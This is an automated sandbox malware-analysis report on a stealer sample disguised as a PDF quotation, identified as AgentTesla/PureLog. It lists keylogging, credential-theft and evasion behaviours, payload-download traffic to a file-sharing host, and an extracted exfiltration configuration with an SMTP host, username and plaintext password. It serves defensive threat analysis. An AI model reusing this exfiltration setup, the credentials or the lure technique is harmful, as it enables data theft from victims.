Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION_APRQTRA031244#U00faPDF.scr.exe

Overview

General Information

Sample name:QUOTATION_APRQTRA031244#U00faPDF.scr.exe
renamed because original name is a hash value
Original sample name:QUOTATION_APRQTRA031244PDF.scr.exe
Analysis ID:1430332
MD5:715a6e943fbaf2e9205a70e391d0fd1c
SHA1:acc6f23393b146fc1c815b06c322280ac27d50ba
SHA256:a22b502cc5b1476fef59963f2df2eaea9086e775923d82308cecac83d5c5cbcd
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains potential unpacker
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • QUOTATION_APRQTRA031244#U00faPDF.scr.exe (PID: 5356 cmdline: "C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe" MD5: 715A6E943FBAF2E9205A70E391D0FD1C)
    • aspnet_compiler.exe (PID: 7700 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "gator3220.hostgator.com", "Username": "minors@aoqiinflatables.com", "Password": "RaFv@tsTUK55@@<<!!"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2242734994.00000000070F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2226154366.00000000044F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 18 entries
            SourceRuleDescriptionAuthorStrings
            0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4781400.8.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.44f9dd0.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.70f0000.13.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4781400.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4599df0.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 22 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe, ParentProcessId: 5356, ParentProcessName: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 7700, ProcessName: aspnet_compiler.exe
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "gator3220.hostgator.com", "Username": "minors@aoqiinflatables.com", "Password": "RaFv@tsTUK55@@<<!!"}
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeReversingLabs: Detection: 52%
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeJoe Sandbox ML: detected
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.4:49738 version: TLS 1.2
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003BA1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2245901969.0000000007490000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003BA1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2245901969.0000000007490000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 4x nop then jmp 0731FD59h0_2_0731FCF8
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 4x nop then jmp 0748A541h0_2_0748A7B4
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 4x nop then jmp 0748A541h0_2_0748A60F
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 4x nop then jmp 0748A541h0_2_0748A448
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 4x nop then jmp 0748A541h0_2_0748A438

                      Networking

                      barindex
                      Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: GET /data-package/aPtWC5T9/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /storage/download/fNtpaSFzWEzZ HTTP/1.1Host: s22.filetransfer.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /data-package/aPtWC5T9/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.21.13.139 104.21.13.139
                      Source: Joe Sandbox ViewIP Address: 104.21.13.139 104.21.13.139
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /data-package/aPtWC5T9/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /storage/download/fNtpaSFzWEzZ HTTP/1.1Host: s22.filetransfer.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /data-package/aPtWC5T9/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: filetransfer.io
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filetransfer.io
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://filetransfer.io/data-package/aPtWC5T9/download
                      Source: aspnet_compiler.exe, 00000004.00000002.2896066000.0000000003041000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2896066000.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2896066000.0000000003117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2896066000.0000000003041000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2896066000.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://ocsp.thawte.com0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://s.symcd.com06
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://s.symcd.com0_
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2896066000.0000000003041000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2896066000.00000000030FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://sw.symcb.com/sw.crl0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://sw.symcd.com0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://sw1.symcb.com/sw.crt0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: https://d.symcb.com/cps0%
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: https://d.symcb.com/rpa0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: https://d.symcb.com/rpa0)
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/aPtWC5T9/download
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s22.filetransfer.io
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002B39000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s22.filetransfer.io/storage/download/fNtpaSFzWEzZ
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.4:49738 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, l8rGfzxi.cs.Net Code: iCBE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.2d48e7c.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: initial sampleStatic PE information: Filename: QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_00F762FF0_2_00F762FF
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_00F763100_2_00F76310
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_05C008080_2_05C00808
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_05C007F90_2_05C007F9
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_05C009440_2_05C00944
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_05C0583F0_2_05C0583F
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_072007B00_2_072007B0
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_0720CDB80_2_0720CDB8
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_0720F36F0_2_0720F36F
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_0720F3B80_2_0720F3B8
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_07487FB00_2_07487FB0
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_074806D70_2_074806D7
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_07480D3C0_2_07480D3C
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_074801960_2_07480196
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_074888800_2_07488880
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_07487C680_2_07487C68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0163C6704_2_0163C670
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01634AC04_2_01634AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0163CF124_2_0163CF12
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01633EA84_2_01633EA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_016341F04_2_016341F0
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeStatic PE information: invalid certificate
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003BA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2234367283.0000000005DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFmfcpx.exe8 vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea2008e0c-49e9-4951-9077-6b05297ad1bf.exe4 vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUacfwlw.dll" vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2245901969.0000000007490000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
